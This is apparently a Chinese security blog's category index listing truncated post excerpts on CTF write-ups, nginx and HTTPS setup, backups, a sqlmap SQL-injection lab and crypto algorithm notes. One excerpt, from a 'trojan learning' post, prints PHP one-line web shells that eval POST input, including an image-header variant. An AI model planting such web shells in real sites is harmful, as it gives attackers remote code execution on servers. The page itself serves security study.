随笔分类 - 网安
摘要:CISCN 2023 WEB unzip 前置知识 unzip是linux系统下的一个解压缩命令: unzip指令解压,将压缩文件test.zip在指定目录/tmp(当前)下解压缩,如果已有相同的文件存在,要求unzip命令覆盖原先的文件。 软连接:类似于Windows的快捷方式,但是它可以直接操作
阅读全文
摘要:cauc ctf wp ez_隐写 如果计算机是中国人发明的 Welcome! easy_rsa from Crypto.Util.number import * import gmpy2 import libnum import random import hashlib n= 0x52d483c
阅读全文
摘要:配置nginx HTTPS证书 安装Cerbot Let‘s Encrypt apt安装不了cerbot,换snapd sudo apt install snapd sudo snap install --classic certbot 确保Certbot命令可以通过创建一个符号链接到/usr/bi
阅读全文
摘要:Nginx安装配置 安装 首先检查是否已安装 nginx -v 并未安装,所以继续安装 apt install nginx-core nginx安装完成后的文件位置 /usr/sbin/nginx:主程序 /etc/nginx:存放配置文件 /usr/share/nginx:存放静态文件 /var/
阅读全文
摘要:Web [转载学习] 随着 WEB 2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于 WEB 环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在 WEB 平台上,WEB 业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是 WEB 安全威胁的凸显,黑客利用网站操作系统的漏洞和
阅读全文
摘要:网站备份 linux下备份指令 cp命令:cp -R /var/www/html /tmp rsync命令:rsync -avz /var/www/html username@remote_server:/backup tar命令:tar -zcf /backups/html_backup.tar.
阅读全文
摘要:木马学习 一句话木马 案例(不免杀) php <?php @eval($_POST[cmd]);?> <?php @eval($_REQUEST[cmd]);?> 图片马 GIF89a <script language='php'>@eval($_POST['cmd'])</script> asp
阅读全文
摘要:春秋云镜靶场 CVE-2022-32991 Web Based Quiz System SQL注入 介绍 该CMS的welcome.php中存在SQL注入攻击。 利用sqlmap爆破 pyload 发现在以下界面存在sql注入: sql注入: python sqlmap.py -u "http://
阅读全文
摘要:平方-乘算法与Miller-Rabin素性测试算法 平方-乘算法 代码实现 a=19244;h=17;n=221 a=input("a^h(mod n)\na");h=input("h");n=input("n") h=int(h);a=int(a);n=int(n) H=bin(h) z=a #p
阅读全文
摘要:数据结构与算法 课程笔记 树与二叉树 概念 树是分层次的,结点所在的层次都是由根算起,根结点所在第一层,根的儿子在第二层,在树中,父结点在同一层的所有结点构成兄弟关系。 树中最大的层次称为树的深度,亦称高度。 看层数: 如果根结点第0,层数=深度=高度-1 如果根结点第1,层数=深度=高度 深度定义
阅读全文
摘要:Public-Key Cryptography EEA 拓展欧几里得算法 算法实现 #include<bits/stdc++.h> using namespace std; int t1,t0,q,tem; int eea(int a,int m){//a>m if(a==0 || m==0)ret
阅读全文
浙公网安备 33010602011771号